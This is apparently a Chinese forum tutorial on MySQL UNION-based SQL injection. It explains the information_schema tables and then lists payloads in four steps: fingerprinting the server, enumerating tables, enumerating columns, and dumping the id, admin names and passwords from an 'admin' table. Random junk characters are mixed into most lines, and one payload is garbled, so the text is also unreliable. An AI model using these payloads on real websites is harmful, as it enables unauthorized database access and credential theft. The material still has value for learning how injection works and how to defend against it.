mysql常规注入

admin

本文介绍MYSQL盲注的一些语句和方法

: i* j8 O2 g; U; {8 K+ z学习盲注前先了解下 IFORMATION_SCHEMA 库
1 X$ H/ P5 K/ {+ }' M1 q: v; |
5 ?; _2 j- {! [: y% iMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
( m; \+ O1 X' \6 K( c3 L1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
|---字段：SCHEMA_NAME ->数据库名称
/ f) f, Y4 ?% B# T
|TABLES ->存储表名
! O: {3 V1 X# A8 C0 x+ f3 m/ {|---字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
+ Z! T: i  y& l* y( n, j|---字段：TABLE_NAME ->存储表的表名

: F3 [% m" ]3 Y8 u& V) ^7 z|COLUMNS ->存储的字段名表
7 w5 x3 H: g, u6 L) @" I8 X7 Y|---字段：TABLE_SCHEMA ->该字段所属数据库名
|---字段：TABLE_NAME ->存储所属表的名称
4 |) _/ k4 Q0 z9 W# T" N6 r0 J5 ^/ f
1 S, g( o* T$ E0 S' ||---字段：COLUMN_NAME ->该字段的名称


: b( F7 H% [+ V- B& w  w$ X5 ^! ~
###########################################################################

0x001 获取系统信息:

" c, P) u! J) ]6 F3 C5 g% m, xunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*
' ]6 v1 D1 a2 u' Z  N" N- g
@@global.version_compile_os 获取系统版本
# I! v* s$ J$ i% ~+ F( j2 A
@@datadir 数据库路径
database() 当前数据库名称
; ^; ]3 ]3 u/ x) g( h* `, S  O9 [0x3c62723e 换行HEX值
9 C) ?% i+ b1 q+ X" S3 I3 ?# r
5 F6 L: i. `, Q  s*/



; [2 F# O$ ^' g7 L2 K######################################################################

1 V, E2 F  i- j  `! v6 m0x002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
+ F$ j$ i' ~% T! v( i, ^6 G
1 T2 E  V, m' _$ \5 C( h5 @" X* b0 o
# O# d1 w. ^, N6 g& M' k$ ^% _" k
/*
; D$ c) T7 m8 r
* W0 ~5 V. D8 y) k# C4 X* j. X0x67617264656e 为当前数据库名

2 o. q; D$ a' J) ^! Y- ~4 u1 mgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/
, {+ I1 y' E8 o7 F) M! n4 _& u. E
######################################################################
2 Q$ y% W3 ^0 ~8 B
6 T$ }& g3 j( s6 }. x( U/ I

5 A1 T: }7 E( X: W0x003 获取字段
- {: a+ R# u4 B" V( U1 H* S: g$ \+ i
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
; b4 k8 i. C$ N" b$ d# f: ]
/*
, ^3 C3 _2 d% W& _+ v) ~
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
# v5 R6 Q( K  U! i. m
( s9 C: x% ?& [" b/ F9 \; D1 E0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/
+ W9 y. Y4 s- g
#####################################################################

& ^+ S, v5 m' o6 Y, ]5 B4 f
9 T) `' X4 J" h) e9 ]7 O6 S9 }
0x004 获取数据
) E" m0 _  v$ t( |1 g
& n; o! F- a8 lunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

/ Y1 @' z9 X* L( ~union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
# F# Y" n6 N8 b0 x5 F$ t* l. N* y
! L* A% v" m1 K4 m# I; ?
$ n* h0 x' E; J1 c
' L0 Y$ a& Y9 _& G. R, \/*

9 N7 I. Z+ n  R/ g' f  V/ C0x3c62723e 换行符号HEX编码
# ?, P+ K* A$ _6 H, N  ]
group_concat 同时获得该字段所有数据
& s* x( t1 z* m
4 i& J8 c  ~/ }, p$ z" o*/
5 [  q8 y$ e3 e& _$ {
( c8 f3 \) K7 ~: h% H& }1 N; C2 _* O+ T